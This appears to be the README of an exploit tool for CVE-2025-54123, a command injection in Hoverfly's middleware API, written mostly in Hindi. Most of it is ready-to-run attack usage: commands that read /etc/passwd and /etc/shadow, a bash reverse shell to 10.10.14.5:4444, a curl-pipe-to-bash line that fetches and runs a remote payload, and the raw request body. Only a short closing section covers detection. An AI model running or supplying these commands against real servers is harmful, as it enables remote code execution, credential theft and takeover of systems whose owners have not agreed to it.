
CVE-2025-54123 Hoverfly Authenticated Middleware Command Injection RCE
Hoverfly प्रमाणीकृत मिडलवेयर कमांड इंजेक्शन RCE | CVSS 9.8 गंभीर
Hoverfly <= 1.11.3, /api/v2/hoverfly/middleware एंडपॉइंट के माध्यम से प्रमाणीकृत कमांड इंजेक्शन के लिए संवेदनशील है। व्यवस्थापक क्रेडेंशियल्स आवश्यक हैं, लेकिन एक बार प्रमाणीकृत होने पर, मिडलवेयर कार्यक्षमता उपयोगकर्ता द्वारा प्रदान किए गए बाइनरी और स्क्रिप्ट मानों को बिना सत्यापन के स्वीकार कर लेती है, जिससे मनमाना कमांड निष्पादन संभव हो जाता है।
middleware.go मनमाना बाइनरी पथ स्वीकार करता हैlocal_middleware.go सीधे उपयोगकर्ता इनपुट को exec.Command() में पास करता हैhoverfly_service.go सत्यापन के दौरान मिडलवेयर निष्पादित करता हैpython3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
-t, --target - Hoverfly API एंडपॉइंट (आवश्यक)-u, --username - व्यवस्थापक उपयोगकर्ता नाम (आवश्यक)-p, --password - व्यवस्थापक पासवर्ड (आवश्यक)-c, --command - निष्पादित करने का आदेश (आवश्यक)--shell - उपयोग करने के लिए शेल बाइनरी (डिफ़ॉल्ट: /bin/bash)# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami
# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"
# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"
# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh
# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"
/api/v2/hoverfly/middleware पर PUT अनुरोध भेजता है/tmp/hoverfly_<random> पर लिखता है<shell> /tmp/hoverfly_<random>{
"binary": "/bin/bash",
"script": "whoami"
}
HTTP हेडर में शामिल हैं:
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json
core/middleware/middleware.go:94-96 - बाइनरी पैरामीटर पर कोई इनपुट सत्यापन नहींcore/middleware/local_middleware.go:14-19 - असुरक्षित exec.Command() उपयोगcore/hoverfly_service.go:173 - सत्यापन के दौरान तत्काल निष्पादनइनकी तलाश करें:
/api/v2/hoverfly/middleware पर PUT अनुरोध/tmp/hoverfly/ में अस्थायी फ़ाइलें/api/v2/hoverfly/middleware एंडपॉइंट एक्सेस की निगरानी करेंमूल खोज: @Kr1shna4garwal